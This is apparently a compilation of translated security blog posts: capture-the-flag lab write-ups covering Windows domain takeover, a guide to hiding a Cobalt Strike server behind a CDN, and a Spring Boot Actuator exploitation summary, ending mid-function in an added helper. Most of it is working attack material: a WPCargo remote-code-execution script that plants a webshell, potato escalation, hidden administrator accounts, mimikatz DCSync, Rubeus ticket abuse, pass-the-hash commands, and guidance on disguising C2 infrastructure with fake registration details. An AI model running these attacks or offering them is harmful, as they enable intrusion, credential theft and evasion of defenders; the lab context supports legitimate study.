Now the host accepts SSH logins with the private key. Searching for the flag only finds a note saying it is not here.

MySQL weak password
Check the listening ports on this machine:

    netstat -aptn

The shell history shows the MySQL password is 123456 (it could also have been brute-forced):

    history

Read the flag from the database:

    mysql -uroot -p123456
    mysql> show databases;
    mysql> use secret;
    mysql> show tables;
    mysql> select * from f1agggg01;

This gives the first flag.

Second flag

Intranet penetration
Upload npc, configure the proxy, and scan 172.22.7.0/24 with fscan:

    172.22.7.67:8081 open
    172.22.7.13:80 open
    172.22.7.13:22 open
    172.22.7.67:445 open
    172.22.7.31:445 open
    172.22.7.67:21 open
    172.22.7.6:445 open
    172.22.7.67:80 open
    172.22.7.67:139 open
    172.22.7.31:139 open
    172.22.7.6:139 open
    172.22.7.31:135 open
    172.22.7.67:135 open
    172.22.7.6:135 open
    172.22.7.6:88 open
    172.22.7.13:2375 open
    [+] NetInfo: [*]172.22.7.6 [->]DC02 [->]172.22.7.6
    [*] 172.22.7.67 XIAORANG\WIN-9BMCSG0S
    [*] WebTitle:http://172.22.7.13 code:200 len:27170 title:XX Decoration
    [+] NetInfo: [*]172.22.7.67 [->]WIN-9BMCSG0S [->]172.22.7.67
    [+] NetInfo: [*]172.22.7.31 [->]ADCS [->]172.22.7.31
    [*] 172.22.7.31 XIAORANG\ADCS
    [*] 172.22.7.6 [+]DC XIAORANG\DC02
    [*] WebTitle:http://172.22.7.13:2375 code:404 len:29 title:None
    [+] ftp://172.22.7.67:21:anonymous
       [->]1-1P3201024310-L.zip
       [->]1-1P320102603C1.zip
       [->]1-1P320102609447.zip
       [->]1-1P320102615Q3.zip
       [->]1-1P320102621J7.zip
       [->]1-1P320102J30-L.zip
    [*] WebTitle:http://172.22.7.67 code:200 len:703 title:IIS Windows Server
    [*] WebTitle:http://172.22.7.67:8081 code:200 len:4621 title:Company management backend
    [+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
    [+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
    [+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak

Anonymous FTP
http://172.22.7.67:8081/www.zip is a backup archive. After decompression, its download folder turns out to be the same directory as the share reachable over anonymous FTP, so a webshell can be uploaded through FTP and reached at:

    http://172.22.7.67:8081/download/shell.asp

Escalate with a Potato exploit directly; upload SweetPotato.exe:

    SweetPotato.exe -a 'whoami'

Testing shows 3389 is enabled, so add an account and log in over RDP:

    SweetPotato.exe -a 'net user devyn Admin@123 /add'
    SweetPotato.exe -a 'net localgroup administrators devyn /add'

This gives the second flag.

Third flag

The newly created local user cannot run domain commands, so a domain account is needed: dump one and log in with pass-the-hash, or log in directly if the plaintext is recovered. mimikatz could be run from the webshell to grab hashes; here the remote desktop made it more convenient to run from cmd. The dumped domain account is zhangfeng/FenzGTaVF6En; log in again with that domain account (the username must be entered as [email protected]).

Shadow credentials
Reference: https://wiki.whoamianony.top/active-directory-methodology/shadow-credentials

The following accounts have write access to the msDS-KeyCredentialLink attribute:

    domain administrator accounts
    members of the Key Admins group
    members of the Enterprise Key Admins group
    accounts with GenericAll or GenericWrite on the target object in Active Directory
    machine accounts, on their own msDS-KeyCredentialLink attribute

zhangfeng is in the Key Admins group and therefore has write access. Add shadow credentials to the msDS-KeyCredentialLink attribute of the domain controller's machine account:

    Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab

On success, Whisker prints the Rubeus command that requests a TGT using certificate authentication; append /ptt to that command so the ticket is injected into the session.

The domain controller's machine account has the replication privileges, so mimikatz can run DCSync and export the domain hashes:

    mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Pass the hash:

    proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:bf967c5a0f7256e2eaba589fbd29a382 [email protected]

Original link: https://zhuanlan.zhihu.com/p/581451146
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Brute4Road writeup
Instructions
Brute4Road is a range environment of medium difficulty. Completing it helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in internal penetration, strengthens their understanding of the core authentication mechanism of a domain environment, and covers some interesting techniques of domain penetration. There are 4 flags, distributed across different hosts.

Techniques: Redis, brute force, SMB, privilege escalation, domain penetration

First flag

Redis master-slave replication RCE
Scan the entry IP with fscan. If the entry IP differs below, that is because the environment was restarted; the process is unaffected. Redis is reachable without authentication. Writing a cron job for a reverse shell fails with a permission error, but the master-slave replication RCE succeeds.

SUID privilege escalation
The shell runs as the redis user and needs escalation. Look for SUID binaries (see any Linux SUID escalation guide for details):

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;

base64 is SUID, so it can read files as root; read the flag and decode it:

    base64 '/home/redis/flag/flag01' | base64 --decode

Second flag

WPCargo unauthenticated RCE
Set up a proxy on the entry host and scan the intranet; upload npc and fscan with wget:

    start ping
    (icmp) Target 172.22.2.18 is alive
    (icmp) Target 172.22.2.34 is alive
    (icmp) Target 172.22.2.3 is alive
    (icmp) Target 172.22.2.7 is alive
    (icmp) Target 172.22.2.16 is alive
    [*] Icmp alive hosts len is: 5
    172.22.2.16:445 open
    172.22.2.34:445 open
    172.22.2.3:445 open
    172.22.2.18:445 open
    172.22.2.16:139 open
    172.22.2.34:139 open
    172.22.2.3:139 open
    172.22.2.34:135 open
    172.22.2.16:135 open
    172.22.2.18:139 open
    172.22.2.3:135 open
    172.22.2.16:80 open
    172.22.2.3:88 open
    172.22.2.18:22 open
    172.22.2.7:80 open
    172.22.2.7:22 open
    172.22.2.7:6379 open
    172.22.2.16:1433 open
    172.22.2.7:21 open
    172.22.2.18:80 open
    [*] alive ports len is: 20
    start vulscan
    [+] NetInfo: [*]172.22.2.16 [->]MSSQLSERVER [->]172.22.2.16
    [*] 172.22.2.34 XIAORANG\CLIENT01
    [*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)
    [+] NetInfo: [*]172.22.2.3 [->]DC [->]172.22.2.3
    [*] WebTitle:http://172.22.2.16 code:404 len:315 title:Not Found
    [+] NetInfo: [*]172.22.2.34 [->]CLIENT01 [->]172.22.2.34
    [*] WebTitle:http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
    [*] 172.22.2.16 XIAORANG\MSSQLSERVER Windows Server 2016 Datacenter 14393
    [*] 172.22.2.3 [+]DC XIAORANG\DC Windows Server 2016 Datacenter 14393
    [*] 172.22.2.18 WORKGROUP\UBUNTU-WEB02
    [*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)
    [+] ftp://172.22.2.7:21:anonymous [->]pub
    [*] WebTitle:http://172.22.2.18 code:200 len:57738 title:Another WordPress site

Scan the WordPress site with wpscan:

    proxychains wpscan --url http://172.22.2.18

It reports the wpcargo plugin, which has an unauthenticated RCE: https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a. The PoC:

    import sys
    import binascii
    import requests

    # Magic string: when these bytes are interpreted as barcode pixels and PNG-compressed,
    # the bytes <?=$_GET[1]($_POST[2]); end up verbatim inside the generated PNG file
    payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'


    def encode_character_code(c: int):
        # '1' bits become white pixels, '0' bits (written as 'x') become black pixels
        return '{:08b}'.format(c).replace('0', 'x')


    text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

    destination_url = 'http://172.22.2.18/'
    cmd = 'ls'

    # With 1/11 scale, '1's are encoded as single white pixels and 'x's as single black pixels.
    # barcode.php takes an attacker-controlled filepath, so the PNG is written into the web root as .php
    requests.get(
        f'{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.09090909090909&size=1&filepath=/var/www/html/webshell.php'
    )

    # The webshell is now uploaded; use it to execute a command (?1=function, POST 2=argument)
    print(requests.post(
        f'{destination_url}webshell.php?1=system',
        data={'2': cmd}
    ).content.decode('ascii', 'ignore'))

The generated shell is used as:

    http://172.22.2.18/webshell.php?1=system
    POST: 2=whoami

Connect with AntSword; note that the shell type must be set to cmdLinux (this cost a lot of time because I was not familiar with the tool). Read the database configuration, connect to the database and find the second flag.

Third flag

MSSQL RCE
The database has a table of stored passwords. Use it as a wordlist to brute force MSSQL; the password is ElGNkOiC. Connect with Multiple Database Utilization Tools (MDUT), enable the Ole Automation Procedures component first, then upload SweetPotato.exe to escalate to SYSTEM:

    C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a 'netstat -ano'

3389 is open, so add a user and connect over RDP:

    net user devyn Admin123 /add
    net localgroup administrators devyn /add

The remote connection succeeds and gives the third flag.

Fourth flag

Domain penetration
Use mimikatz to dump the hash of the MSSQLSERVER$ machine account: 78a2811aabd779d0da3cef84903ca3e6.

Constrained delegation
The MSSQLSERVER machine is configured with constrained delegation to the DC's LDAP and CIFS services. First request a TGT for the machine account MSSQLSERVER$ with Rubeus; the output is the Base64-encoded TGT:

    Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78a2811aabd779d0da3cef84903ca3e6 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Then use S4U2Self followed by S4U2Proxy (Rubeus s4u performs both) to impersonate the domain administrator Administrator, request a service ticket for the DC's LDAP service and inject it into memory:

    Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jomeuPBK3C69yaGuyDCLGYHRyVjZg4zXrEwUSwvFS0kZ+4Q2uTcKGqYw3GLs5sf0/MJ0fHiL1V8u5WrLpgR5hBlYUGN+g1zmv3uiTXO7QobxH0lR0dUUKuNdPoxdPdx26Liz5/xdDFvz4xTyMKDqqRxgBWquqGjh1cp/woy4U4tXJo+L8CfQ424Kgdb3n/rJYRNY54m8QHl/smHg3PpMgTT2FEiJ5Jag+qDpM/R/XUOIJHNzSfCVi2XiLGqPF374jUbih9UTZvlqRoSHz9qljZlBsEAqen9ctu01tmNn4ACRz4mqMV11MyV9scfeJnQbCpGdS+zveSrT53dwFotrg00o4Jq6RGr9dR/6ZMKC1W/kfwSXdF1b/H3HOMM7HzK0qLfSbDtq8i1e2FdZ5kyOVbbtAE6irAizzK7ScDS4rO9RRSDl6BNaV25nkjce6j9dj4V56ua1Gh+F+JQfAHbE8zLNt9OmseJs6IGj/cxKEckbhcggGhQhL3c6k1FKZOTXY1PKR8zweZauWgK7FXiDLEP1h6YwP2S/frDmKRb5mCdBUUQBzsA/6BBmEAnxvfKX1B8xViT0rq1I/pLKS9LKWTKyuHJd67z6XDRN7IWR0fstyqGuvHPn391l02zNUJRK5/7jyOyKwhQ3sb/XRzC4YbLeGgImMGRZ0fqrQ+hRBQbTuNr2/i4hgyWDLuBSEvz5qb1kXcebRkWuCHhpGKtsdbyZ30tnpA0W2qWu8qJ8zKks04r2Hj91lCPudAbrjhjjFf/UNd+fHcfYlAu0xzMuR8eKUA22Lcv0fEf2igvIu38bCRvUjfGkh423fgPsR4Xom8/8lNWhU+kaAiGSwSER8UGr8jiDVjtmgF5ScFoQDM+kVJ5o0ZnettUHJhcVMAdlI1QTq5WjQRIea6u4d6bYSHI43ips6So8hEcsB/03FpOKR/SRUYveALw3IAwAJtAPtW/SrzUeLXEemVg2aADTl1qXNw04A0e9v8XQnnm7lyCJfmI3pXJVsycjJyviDwazFtHGbQoM3fhlZ4zpBlfBKagxQr624YO5yIaJbl9/Dp4M7iauUIbo7kAWCfka1iafKyGDFGAXudAb52dt72jw0/QpeLP08RORDLtY8IrpjKAzHsSGuVYukY07lR+ck95MeKFDnl8cwaKw0MB8f92n4g4OfWQbUJK/479LYMZBDG38iwHHv/MLiaCylHm5nazaY0JJxJ2CeqIvsAFlfm7gp23V5Hj/T+eKt0zd3EIjNhuwBvhYeVKKQCFJZGaRelQKxaptmKhhgILA+wTKvCxpQX6qx8b40pg9r1rr4zQ9buPb4JNnqwHe5SIgPURR02Xv5FUiiI9Qc5//bUhxCEOXi0TFASRbghAyNA/TLRVAqfvtgqv6SKb4jw265bdrQQrPITm1En79jsNw6adH1curFJr++PS6ZYX6yqK3DlJ5Piiy2OAVLPIPcN1zmbZ+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBAXgLFznI5hHEOCpAjFdNEoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIyMTAyODEyMjIzM1qmERgPMjAyMjEwMjgyMjIyMzNapxEYDzIwMjIxMTA0MTIyMjMzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

An Administrator ticket for the LDAP service carries DCSync rights, so export the domain hashes:

    mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Domain administrator hash: 1a19251fbd935969832616366ae3fe62

WMI lateral movement
With the domain administrator's hash, log in to the domain controller through WMI (the LM half of -hashes is 32 zeros):

    python wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 [email protected]

This gives the fourth flag.

Alternative
The domain controller can also be reached directly by passing the hash with crackmapexec:

    proxychains crackmapexec smb 172.22.2.3 -u administrator -H 1a19251fbd935969832616366ae3fe62 -d xiaorang.lab -x 'type Users\Administrator\flag\flag04.txt'

Original link: https://zhuanlan.zhihu.com/p/581577873
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Tsclient Writeup
0x1 Info
Tags: MSSQL, Privilege Escalation, Kerberos, Domain Penetration, RDP
Range address: https://yunjing.icunqiu.com/ranking/summary?id=BzMFNFpvUDU

0x2 Recon
Target external IP: 47.92.82.196. nmap scan (screenshot omitted). MSSQL weak-password brute force yields a valid credential, sa:1qaz!QAZ; the resulting permission is that of the service account (MSSQLSERVER).

0x3 Entry Point: MSSQL - 172.22.8.18
Note first that this machine is not itself in the domain. MSSQL shell (I forgot to take a screenshot here). Privilege escalation: brute-force CLSIDs for the Potato attack (the first few CLSIDs do not work). Modify GetClsid.ps1 to add execution of the Potato binary, upload Potato and GetClsid.ps1, run GetClsid.ps1, and obtain a working CLSID together with the command output. Export SAM, SYSTEM and SECURITY, extract the credentials, and move laterally as administrator with psexec over port 139 (445 is not reachable from outside) to obtain flag01.
administrator 2caf35bb4c5059a3d50599844e2b9b1f
qwinsta and the connection table show a machine connected in over RDP. Use administrator + psexec to get into msf (SYSTEM), use the incognito module and impersonate john (I tested that only msf's incognito can complete the subsequent operations; other token-impersonation tools such as the F-Secure Labs one failed). With john's token run net use and see the \\tsclient\C share; credential.txt under \\tsclient\C gives a credential directly and hints at image hijacking (IFEO):
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
Fast forward, skipping the proxy setup: a CME scan of 172.22.8.0/24 shows three machines reporting that the password has expired. Test whether port 88 is open on DC01 (i.e. whether it is the domain controller); DC01 is the DC. Use smbpasswd.py to change the expired password remotely to 111qqq, and ldapshell.py to verify that the domain logon now succeeds. CME RDP enumeration shows that 172.22.8.46 can be logged into (with the official CME RDP module no valid RDP credential is found; I wrote a CME module based on xfreerdp: XiaoliChan/CrackMapExec-Extension).

0x4 Domain Penetration - Entrance - 172.22.8.46
Log in and check: xiaorang.lab\Aldrich is not an administrator of this machine, only an ordinary user, so we need to escalate. Two methods.
Priv-ESC1: Image hijacking (IFEO) escalation (general). Get-ACL shows that 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options' is writable, with subkey creation allowed. Create a key that hijacks magnify.exe (Magnifier) so that it runs cmd.exe, lock the session, click the magnifier on the lock screen, and the shell runs as SYSTEM.
Priv-ESC2: KrbRelayUp escalation. An ordinary domain user takes over the domain-joined machine directly (unconventional, recommended). Fast forward: mimikatz gives the current machine's account:
xiaorang.lab\WIN2016$ 4ba974f170ab0fe1a8a1eb0ed8f6fe1a

0x5 Domain Penetration - DC Takeover
Two methods. Looking at the group membership of WIN2016$, it is in the Domain Admins group, so DCSync takes DC01 directly (process omitted). Constrained delegation (unconventional): BloodHound collects and analyses the domain data and shows a constrained delegation; attack it with getST.py to take DC01.
Original link: https://www.freebuf.com/articles/system/352237.html
-
Title: Hiding the C2 server and bringing Linux online
Tool preparation: a foreign VPS, Free Whale (VPN), CS 4.4, nginx.

CS server configuration

Disable ping on the server
1. When the server does not answer ping, from one perspective the host looks inactive.
2. Edit /etc/sysctl.conf and add the line net.ipv4.icmp_echo_ignore_all=1, then run sysctl -p to apply it.
vim /etc/sysctl.conf
net.ipv4.icmp_echo_ignore_all=1
sysctl -p
3. After that, ping gets no reply. Note that nmap can still find the host alive through other probes (TCP or ARP), so this only defeats naive ping sweeps.

Change the port
1. Edit the teamserver file, search for 50050 and change it to any port; here it is changed to 65000.
vim teamserver
2. Save, exit and start the teamserver; the listening port has changed.
./teamserver xx.xx.xx.xx xiao

Replace the default certificate
1. The certificate generated by the CS server carries all of CS's well-known characteristics, so it is replaced here. There are two ways: generate a keystore yourself, or modify the startup script. Either way, the original cobaltstrike.store must be deleted first.
Method 1: delete cobaltstrike.store and generate a new keystore (recommended)
1. Generate a new keystore:
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname 'CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN'
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
2. Check the certificate:
keytool -list -keystore cobaltstrike.store
3. Start the server and check that the certificate it presents matches the one just generated; after checking, it does.
Method 2: modify the startup script
1. teamserver is the script that starts the CS server. It contains an environment-check section, including a check for the keystore: if no keystore is found, it runs a keytool command to generate one. That generation command is what we modify.
2. The keytool line in teamserver is the part to change.
3. Change it to:
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname 'CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN'
4. Delete the original ./cobaltstrike.store; the next start generates a new keystore automatically.
rm -rf cobaltstrike.store

Hide behind a CDN

Apply for a free domain name
1. Open the freenom website, translate it if needed, scroll to the bottom and select the developer option.
2. Scroll to the bottom and click to get a random domain account today.
3. Enter an international e-mail address and click to verify it. A temporary mailbox is recommended.
4. After a few seconds you receive an e-mail. Open it, click confirm, and you are redirected to the freenom website. Translate the page and click the developer option.
5. Scroll to the end of the page, translate, and click to get a random domain account immediately.
6. You then reach the personal information form.
7. Because the address chosen from the IP is Florida, use a Florida personal-information generator together with a general personal-information generator; the two need to be combined.
8. Fill in the information from the generators, review it and click to complete the order. The account is now registered.
9. Return to the homepage, select a domain name, enter xxx.tk, click check availability, and if it is available click checkout.
10. Select the 12-month free option and click continue.
11. Confirm the order.
12. Select My Domains and see that the domain is active.

CDN configuration
1. There are many options for the CDN part; cloudflare is chosen here.
2. After logging in to cloudflare, select Add Site.
3. Choose the free plan.
4. Add DNS records: an A record pointing at the IP to be protected.
5. Change the DNS servers of xxx.tk to cloudflare's. It takes some time to take effect.
6. Turn off Automatic HTTPS Rewrites, Always Use HTTPS and Brotli compression.
7. Click finish.
8. When the following screen appears the settings are in effect and cloudflare handles name resolution for the domain.
9. Resolve www.xxx.tk to test.
10. Using a global ping service shows that the CDN has been added successfully.
11. Set the SSL/TLS encryption mode to Full.

cloudflare generates the certificate
1. On the cloudflare dashboard go to SSL/TLS > Origin Server > Create Certificate, then save the public and private keys as server.pem and server.key respectively. They must be saved at generation time; otherwise the private key cannot be retrieved later.
2. Package the certificate and key into a keystore:
openssl pkcs12 -export -in server.pem -inkey server.key -out www.xxx.tk.p12 -name www.xxx.tk -passout pass:123456
//Use keytool to convert the key pair into the store format CS can use
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.tk.store -srckeystore www.xxx.tk.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.tk
3. Configure the certificate for the HTTPS listener. To use the certificate we applied for, the Malleable C2 profile mechanism is needed; cloudflare.profile is used as the example. Put the generated .store file in the CS directory and point the certificate configuration in cloudflare.profile at it. Note that https-certificate is the certificate-related block, the Host value in the client headers must be the domain we applied for, and the other parts are configured according to personal preference.
//Copy the store generated above to the teamserver directory
cp ./www.xxx.tk.store /opt/cs44/
//Create the cloudflare.profile file
vim cloudflare.profile
//cloudflare.profile file content
https-certificate {
    set keystore "www.xxx.tk.store";
    set password "123456";
}
http-stager {
    set uri_x86 "/api/1";
    set uri_x64 "/api/2";
    client { header "Host" "www.xxx.tk"; }
    server { output { print; } }
}
http-get {
    set uri "/api/3";
    client {
        header "Host" "www.xxx.tk";
        metadata { base64; header "Cookie"; }
    }
    server { output { print; } }
}
http-post {
    set uri "/api/4";
    client {
        header "Host" "www.xxx.tk";
        id { uri-append; }
        output { print; }
    }
    server { output { print; } }
}
4. Verify that the profile has no problems. The following is the verification (the current directory must contain cobaltstrike.jar):
//Create a c2lint file
vim c2lint
//c2lint file content
java -XX:ParallelGCThreads=4 -XX:+UseParallelGC -classpath ./cobaltstrike.jar c2profile.Lint $1
//Verify the profile
./c2lint cloudflare.profile
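The certificate replacement above is only worth doing if the teamserver really stops presenting the stock subject that scanners fingerprint. The following is an added check, not code from the original post: a stdlib-only DER walker that reads the subject out of an X.509 certificate and compares it with the default subject of the cobaltstrike.store that ships with Cobalt Strike (C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike). check_teamserver() fetches the live certificate without validation, since the keystore is self-signed; the port default of 50050 assumes the port has not yet been changed as described above.

```python
"""Added example (not from the original post): does a teamserver still present
Cobalt Strike's stock certificate subject?  The DER walker below is a minimal
stdlib-only parser, enough to read the subject Name out of an X.509
certificate without third-party libraries."""
import ssl
from typing import Dict, List, Tuple

OID_NAMES = {"2.5.4.3": "CN", "2.5.4.6": "C", "2.5.4.7": "L",
             "2.5.4.8": "ST", "2.5.4.10": "O", "2.5.4.11": "OU"}

# Subject of the keystore Cobalt Strike ships by default
DEFAULT_CS_SUBJECT = {"C": "Earth", "ST": "Cyberspace", "L": "Somewhere",
                      "O": "cobaltstrike", "OU": "AdvancedPenTesting",
                      "CN": "Major Cobalt Strike"}


def _tlv(der: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag-length-value at pos; return (tag, value, next position)."""
    tag, length, pos = der[pos], der[pos + 1], pos + 2
    if length & 0x80:                      # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(der[pos:pos + n], "big")
        pos += n
    return tag, der[pos:pos + length], pos + length


def _children(value: bytes) -> List[Tuple[int, bytes]]:
    """Split the content of a constructed type into its (tag, value) elements."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = _tlv(value, pos)
        out.append((tag, val))
    return out


def _decode_oid(raw: bytes) -> str:
    parts, acc = [str(raw[0] // 40), str(raw[0] % 40)], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(str(acc))
            acc = 0
    return ".".join(parts)


def _name_content(value: bytes) -> Dict[str, str]:
    """X.501 Name: SEQUENCE OF (SET OF (SEQUENCE { OID, value }))."""
    out = {}
    for _, rdn in _children(value):
        for _, atv in _children(rdn):
            (_, oid), (_, text) = _children(atv)[:2]
            oid_str = _decode_oid(oid)
            out[OID_NAMES.get(oid_str, oid_str)] = text.decode("utf-8", "replace")
    return out


def parse_name(name_der: bytes) -> Dict[str, str]:
    """Decode a complete DER-encoded Name (including its outer SEQUENCE header)."""
    _, value, _ = _tlv(name_der, 0)
    return _name_content(value)


def subject_from_cert(cert_der: bytes) -> Dict[str, str]:
    """Certificate -> TBSCertificate -> [version] serial signature issuer validity subject."""
    _, cert, _ = _tlv(cert_der, 0)
    _, tbs, _ = _tlv(cert, 0)
    fields = _children(tbs)
    if fields[0][0] == 0xA0:               # explicit [0] version is optional
        fields = fields[1:]
    return _name_content(fields[4][1])


def default_cs_indicators(subject: Dict[str, str]) -> List[str]:
    """Fields of the subject that still match the stock Cobalt Strike certificate."""
    return [f"{k}={v}" for k, v in DEFAULT_CS_SUBJECT.items() if subject.get(k) == v]


def check_teamserver(host: str, port: int = 50050) -> List[str]:
    """Fetch the live certificate (no validation; it is self-signed) and report leftovers."""
    pem = ssl.get_server_certificate((host, port))
    return default_cs_indicators(subject_from_cert(ssl.PEM_cert_to_DER_cert(pem)))
```

An empty list from check_teamserver() means none of the six stock fields survived; anything else is a field the keytool -dname above did not override. The same functions can be pointed at the HTTPS listener port after the cloudflare certificate is installed.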
-
Title: SpringBoot Actuator RCE Vulnerability Summary
I. Recovering values masked with * from /env
When we access a Spring Boot application's /env endpoint directly, some password fields are shown as *. The underlying value of such a field can still be obtained through the ${name} placeholder.
Inappropriate configuration leads to leakage of sensitive information: only keys whose names look sensitive (password and the like) are masked with asterisks, while a key such as pwd is not.
Reference: https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA
Concrete steps. Suppose we want the value of the PID property ('PID': '10648'). POST to /env and set eureka.client.serviceUrl.defaultZone to a URL pointing at our listener, with the placeholder as the user part of the URL:

POST /env HTTP/1.1
Host: 10.20.24.191:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

eureka.client.serviceUrl.defaultZone=http://${PID}@10.20.24.191:2444/

Then POST any content to /refresh to trigger the vulnerability. PS: it normally takes about 3 seconds for the response to come back. If it returns immediately, the application probably lacks the dependency that provides /refresh, so the environment cannot be refreshed and this path cannot be exploited.

POST /refresh HTTP/1.1
Host: 10.20.24.191:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

12312

On the server, nc listening on port 2444 receives the Eureka client's request, with the resolved placeholder carried as the user name in the Basic auth header:

root@kali:/tmp# nc -lvvp 2444
listening on [any] 2444 ...
connect to [10.20.24.191] from kali [10.20.24.191] 40960
GET /xstream/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 10.20.24.191
Accept-Encoding: gzip
Host: 10.20.24.191:2444
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.4.11
Authorization: Basic MzgzNDY6bnVsbA==

Base64-decoding Authorization: Basic MzgzNDY6bnVsbA== gives:
root@kali:/tmp# echo MzgzNDY6bnVsbA==|base64 -d
38346:null
the same PID value as above. The user.country property is obtained the same way. Result:

root@kali:/tmp# nc -lvvp 2555
listening on [any] 2555 ...
connect to [10.20.24.191] from kali [10.20.24.191] 38994
GET /xstream/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 10.20.24.191
Accept-Encoding: gzip
Host: 10.20.24.191:2555
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.4.11
Authorization: Basic VVM6bnVsbA==
sent 0, rcvd 310

Base64-decoding gives:
root@kali:/tmp# echo VVM6bnVsbA==|base64 -d
US:null

Scripting: enter the property to query and the port for nc to listen on; listen on the port, grab the specified header and base64-decode it automatically.
PS: if you are lucky enough to have an Eureka-Client below 1.8.7 in the target classpath (usually included with Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. For example, User-Agent: Java-EurekaClient/v1.4.11.

II. SpringBoot Actuator JNDI RCE
1. Environment setup
git clone https://github.com/veracode-research/actuator-testbed
Start it with mvn install or mvn spring-boot:run. After compiling and running, the listening address turns out to be 127.0.0.1, so it is only reachable from the local machine. A quick search shows it just needs to be changed to 0.0.0.0.
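The scripting step in section I above (listen on a port, grab the Authorization header, base64-decode it) is small enough to show in full. The following is an added example, not code from the original post: build_env_body() produces the body that was POSTed to /env, extract_leaked_value() does what nc plus base64 -d did by hand, and listen_once() is the listener. The sample request below is constructed from the nc output on the page; it is not a new capture.

```python
"""Added example (not from the original post): listener-side helper for the
Spring Boot /env placeholder leak via eureka.client.serviceUrl.defaultZone."""
import base64
import socket
from typing import Optional


def build_env_body(placeholder: str, listener_ip: str, listener_port: int) -> str:
    """Body for POST /env: the placeholder becomes the user part of the Eureka URL,
    so the resolved value comes back to us as HTTP Basic credentials."""
    return (f"eureka.client.serviceUrl.defaultZone="
            f"http://${{{placeholder}}}@{listener_ip}:{listener_port}/")


def extract_leaked_value(raw_request: bytes) -> Optional[str]:
    """Return the resolved placeholder from the Authorization: Basic header.
    The URL carried no password, so the client sends '<value>:null'."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n"):
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
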